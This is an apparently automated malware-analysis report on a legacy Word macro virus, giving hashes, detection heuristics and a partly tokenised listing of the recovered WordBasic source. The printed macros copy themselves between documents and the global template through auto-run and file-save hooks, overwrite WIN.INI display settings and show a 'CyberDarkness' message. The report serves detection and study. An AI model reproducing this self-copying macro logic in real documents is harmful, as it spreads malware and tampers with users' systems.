Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c0404bfea6255463…

MALICIOUS

Office (OLE)

11.0 KB First seen: 2012-06-14
MD5: aa37401ab7262228864bf3050b7bf170 SHA-1: 1db94f076f0299e5106e784541b3f87da29967e0 SHA-256: c0404bfea6255463787cf730e0f0aa059d96ad0311dfa4299814c001b4f890ad
102 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file exhibits legacy WordBasic macro virus markers, specifically 'RSN MACRO VIRUS Goat file', and the document body contains explicit references to this. The presence of these markers and the historical context of such files indicate a malicious intent, likely for propagation. No network indicators or further execution details were extracted.

Heuristics 3

  • ClamAV: Win.Trojan.Incarnate-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Incarnate-2
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Recovered legacy WordBasic macro source info OLE_LEGACY_WORDBASIC_MACRO_SOURCE
    The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
wordbasic_macros.txt wordbasic-macro analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source) 5769 bytes
SHA-256: 295332b74afeeba8f321f20cb4cb458ec6bcf46e32a97d25519a4fb054558ebd
Preview script
First 1,000 lines of the extracted script
= , , = = 29551 17253 29551 29551   8300    
21349      
    29793 21349          
        357 19827 * ,   ,  
29797 ,         =
MAIN
, - * Z
@cmd80d6 0
MAIN
, - * Z
@cmd809e
@cmd8008 @cmd810c 21 , 7 = "Windows"
@cmd8103 "C:\WINDOWS\WIN.INI" , 0
@cmd8006 @cmd810c 24 =
@cmd8046 "windows" , "ScreenSaveActive" , "0"
@cmd8046 "windows" , "DoubleClickSpeed" , "500"
@cmd8046 "windows" , "ScreenSaveActive" , "0"
@cmd8046 "windows" , "BorderWidth" , "3"
@cmd8046 "Desktop" , "Pattern" , "(None)"
@cmd8046 "Desktop" , "Wallpaper" , "(None)"
@cmd8046 "Desktop" , "GridGranularity" , "0"
@cmd8046 "Desktop" , "IconSpacing" , "75"
@cmd8046 "colors" , "Background" , "0 0 0"
@cmd8046 "colors" , "AppWorkspace" , "0 0 0"
@cmd8046 "colors" , "Window" , "255 255 255"
@cmd8046 "colors" , "WindowText" , "0 0 0"
@cmd8046 "colors" , "Menu" , "255 255 255"
@cmd8046 "colors" , "MenuText" , "0 0 0"
@cmd8046 "colors" , "ActiveTitle" , "0 0 0"
@cmd8046 "colors" , "InactiveTitle" , "0 0 0"
@cmd8046 "colors" , "TitleText" , "255 0 0"
@cmd8046 "colors" , "ActiveBorder" , "255 0 0"
@cmd8046 "colors" , "InactiveBorder" , "192 192 192"
@cmd8046 "colors" , "WindowFrame" , "0 0 0"
@cmd8046 "colors" , "Scrollbar" , "192 192 192"
@cmd8046 "colors" , "ButtonFace" , "192 192 192"
@cmd8046 "colors" , "ButtonShadow" , "128 128 128"
@cmd8046 "colors" , "ButtonText" , "0 0 0"
@cmd8046 "colors" , "GrayText" , "128 128 128"
@cmd8046 "colors" , "Hilight" , "0 128 128"
@cmd8046 "colors" , "HilightText" , "255 255 255"
@cmd8046 "colors" , "InactiveTitleText" , "255 0 0"
@cmd8046 "colors" , "ButtonHilight" , "255 255 255"
@cmd8103 "C:\WINDOWS\CONTROL.EXE" , 0
"C:\WINDOWS\CONTROL.EXE" 1
1
@cmd80ab "C:\WINDOWS\CONTROL.EXE"
@cmd8046 "Colors" , "Scrollbar" , "192 192 192"
@cmd8046 "Colors" , "Background" , "0 0 0"
@cmd8046 "Colors" , "ActiveTitle" , "0 0 0"
@cmd8046 "Colors" , "InactiveTitle" , "0 0 0"
@cmd8046 "Colors" , "Menu" , "192 192 192"
@cmd8046 "Colors" , "Window" , "0 0 0"
@cmd8046 "Colors" , "WindowFrame" , "0 0 0"
@cmd8046 "Colors" , "MenuText" , "0 0 0"
@cmd8046 "Colors" , "WindowText" , "255 0 0"
@cmd8046 "Colors" , "TitleText" , "255 0 0"
@cmd8046 "Colors" , "ActiveBorder" , "192 192 192"
@cmd8046 "Colors" , "InactiveBorder" , "192 192 192"
@cmd8046 "Colors" , "AppWorkspace" , "0 0 0"
@cmd8046 "Colors" , "Hilight" , "0 0 0"
@cmd8046 "Colors" , "HilightText" , "255 0 0"
@cmd8046 "Colors" , "ButtonFace" , "192 192 192"
@cmd8046 "Colors" , "ButtonShadow" , "128 128 128"
@cmd8046 "Colors" , "GrayText" , "128 128 128"
@cmd8046 "Colors" , "ButtonText" , "0 0 0"
@cmd8046 "Colors" , "InactiveTitleText" , "255 0 0"
@cmd8046 "Colors" , "ButtonHilight" , "255 255 255"
@cmd8046 "Colors" , "ButtonDkShadow" , "0 0 0"
@cmd8046 "Colors" , "ButtonLight" , "192 192 192"
@cmd8046 "Colors" , "InfoText" , "0 0 0"
@cmd8046 "Colors" , "InfoWindow" , "255 0 0"
@cmd8046 "Desktop" , "oldwallpaper" , "0"
@cmd8046 "Desktop" , "oldwallpaper" , "(None)"
@cmd8046 "Desktop" , "TileWallpaper" , "0"
@cmd8046 "Desktop" , "Pattern" , "(None)"
@cmd8046 "Desktop" , "Wallpaper" , "(None)"
@cmd8046 "Desktop" , "WallpaperStyle" , "0"
MAIN
, - * Z
@cmd809e
@cmd80d6 0
A @cmd0054
A
@cmd8008 @cmd803b , 8 = "Document" A
A = 0 A = 1
A = 1
@cmd80c2 "Global:AutoExec" , @cmd803b = ":AutoExec"
@cmd80c2 "Global:AutoExit" , @cmd803b = ":AutoExit"
@cmd80c2 "Global:AutoClose" , @cmd803b = ":AutoClose"
@cmd80c2 "Global:FileClose" , @cmd803b = ":FileClose"
@cmd80c2 "Global:FileSave" , @cmd803b = ":FileSave"
@cmd80c2 "Global:FileSaveAs" , @cmd803b = ":FileSaveAs"
@cmd80c2 "Global:ToolsMacro" , @cmd803b = ":ToolsMacro"
@cmd0054 A
* Z
@cmd0053
MAIN
, - * Z
@cmd809e
A = 1 @cmd80b7 0
@cmd80b8 A , 0 = "FileSave" B = 1 REM Mark 
A
B 1
@cmd80c2 @cmd803b = ":AutoExec" , "Global:AutoExec"
@cmd80c2 @cmd803b = ":AutoClose" , "Global:AutoClose"
@cmd80c2 @cmd803b = ":AutoExit" , "Global:AutoExit"
@cmd80c2 @cmd803b = ":FileClose" , "Global:FileClose"
@cmd80c2 @cmd803b = ":FileSave" , "Global:FileSave"
@cmd80c2 @cmd803b = ":FileSaveAs" , "Global:FileSaveAs"
@cmd80c2 @cmd803b = ":ToolsMacro" , "Global:ToolsMacro"
MAIN
, -
@cmd809e
@cmd80d6 0
@cmd8023 = 1 @cmd8118 = 1
@cmd8111 0
@cmdc011
@cmd807d 10
@cmd8048 0
@cmd8049 0
@cmd8047 1
@cmd8054
@cmd8012 @cmd8005 13 = @cmd8005 13 = "To end with, I would like to say..." = @cmd8005 13 = @cmd8005 13
@cmd8053
@cmd8012 "To defy me is to bring upon my wrath..." = @cmd8005 13 = "For I am"
@cmd8047 6
@cmd8048 1
@cmd8049 1
@cmd8012 " CyberDarkness"
@cmd8048 0
@cmd8049 0
@cmd8047 1
@cmd8012 "..."
@cmd8012 @cmd8005 13 = "I am Darkness Incarnate..." = @cmd8005 13 = "I will Not be Denied!!!" = @cmd8005 13 = @cmd8005 13
@cmd807d 10
@cmd00a2 = "Symbol" , = "211"
@cmd8012 @cmd8007 @cmd80f9 @cmd80f7
@cmd8047 6
@cmd8048 1
@cmd8049 1
@cmd8012 " CyberDarkness"
@cmd8048 0
@cmd8049 0
@cmd8047 1
@cmdc010
@cmd8111 1
B = 1 @cmd80b7 0
@cmd80b8 B , 0 = "FileSave" C = 1
B
C 1
@cmd80c2 @cmd803b = ":AutoExec" , "Global:AutoExec"
@cmd80c2 @cmd803b = ":AutoExit" , "Global:AutoExit"
@cmd80c2 @cmd803b = ":AutoClose" , "Global:AutoClose"
@cmd80c2 @cmd803b = ":FileClose" , "Global:FileClose"
@cmd80c2 @cmd803b = ":FileSaveAs" , "Global:FileSave"
@cmd80c2 @cmd803b = ":FileSaveAs" , "Global:FileSaveAs"
@cmd80c2 @cmd803b = ":ToolsMacro" , "Global:ToolsMacro"
@cmd80a0
MAIN
, - * Z
@cmd809e
@cmd80d6 0
A @cmd0054
A
A
A = 0 A = 1
A = 1
@cmd80c2 "Global:AutoExec" , @cmd803b = ":AutoExec"
@cmd80c2 "Global:AutoExit" , @cmd803b = ":AutoExit"
@cmd80c2 "Global:AutoClose" , @cmd803b = ":AutoClose"
@cmd80c2 "Global:FileClose" , @cmd803b = ":FileClose"
@cmd80c2 "Global:FileSave" , @cmd803b = ":FileSave"
@cmd80c2 "Global:FileSaveAs" , @cmd803b = ":FileSaveAs"
@cmd80c2 "Global:ToolsMacro" , @cmd803b = ":ToolsMacro"
@cmd0054 A
MAIN
REM Temp Delete Rest
dlg @cmd00d7
dlg
dlg
@cmd00d7 dlg